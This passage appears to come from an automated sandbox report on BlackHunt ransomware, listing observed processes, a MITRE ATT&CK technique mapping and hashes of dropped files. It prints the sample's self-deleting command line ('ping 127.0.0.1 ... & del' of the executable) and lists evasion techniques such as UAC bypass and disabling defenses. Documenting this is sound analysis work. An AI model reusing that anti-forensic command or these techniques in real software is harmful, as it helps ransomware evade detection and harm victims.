      - Modifies registry class
    [3] C:\Windows\SysWOW64\mshta.exe (PID 6964)
        cmdline: "C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      [4] C:\Windows\SysWOW64\WerFault.exe (PID 4960)
          cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6964 -s 1444
          - Program crash
  [2] C:\Windows\SysWOW64\cmd.exe (PID 13988)
      cmdline: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\fc4303cde9c73266e452d9ba18111c02fdcc137987635de7b044d7947cb66e87.exe"
    [3] C:\Windows\SysWOW64\PING.EXE (PID 5332)
        cmdline: ping 127.0.0.1 -n 5
        - Runs ping.exe
[1] C:\Windows\System32\Conhost.exe (PID 1444)
    cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
[1] C:\Windows\system32\vssvc.exe (PID 8332)
    cmdline: C:\Windows\system32\vssvc.exe
    - Suspicious use of AdjustPrivilegeToken
[1] C:\Windows\system32\wbengine.exe (PID 12776)
    cmdline: "C:\Windows\system32\wbengine.exe"
    - Suspicious use of AdjustPrivilegeToken
[1] C:\Windows\System32\vdsldr.exe (PID 9272)
    cmdline: C:\Windows\System32\vdsldr.exe -Embedding
[1] C:\Windows\System32\vds.exe (PID 6116)
    cmdline: C:\Windows\System32\vds.exe
    - Checks SCSI registry key(s)
[1] C:\Windows\SysWOW64\WerFault.exe (PID 11824)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 6964 -ip 6964
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Scheduled Task/Job (1)
Defense Evasion
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Impair Defenses (2)
  - Disable or Modify Tools (2)
- Indicator Removal (4)
  - File Deletion (3)
- Modify Registry (5)
Downloads
- Filesize: 1KB
  MD5: 9a56e858c6188d5fce23f8dd4f8483f9
  SHA1: 51671c792d7efcfd0a94cc4a60245bc0a413a517
  SHA256: 2d6214ba03c8e1f1abe9939e6f5d0cd36bb8af05544b5013706388792c7f09a1
  SHA512: 1e06f4239976d9a21caa28fbb328b30bdc81054eca47c331b8e665aafb55ee27f3a589c3ce49208f5ba88a3750ede142761585ee0eb05399fe1c4f431a99deb0
- Filesize: 12KB
  MD5: 347f421896e6f46cd10770304cc675cb
  SHA1: f9ee60e374f2d0f111a9504e8b0da85c41366024
  SHA256: 29c472b3ca758713bed732c100da13ccf84d30ac8e45cb56128a7aab6af9a34c
  SHA512: 4efb33462abdfc3ec3898ccde32e7c4923574c9b45c645852a33a9197bb513dcc3dc0cc98f369f788eed70bbea1f55a841b8a47e1f651d5e3e121f08cfde57bb
- Filesize: 684B
  MD5: 23668b4154eb92ec1b6c102d5ae4a2a7
  SHA1: 10f1fa4f805e886354a5ece322aac1161c2e71e4
  SHA256: d1ac62e474bdd4c13682ec869ec9745cdeaea17eaad958b3d4938228417fc220
  SHA512: 935e177a07f1e8218a4a52453b3c50c2b01fa4c71341a1cc2b7e5cf3b1c156bad74364b8ce6b0683f1e02b829284fa953427ab42f56dee6405e31c7389768e61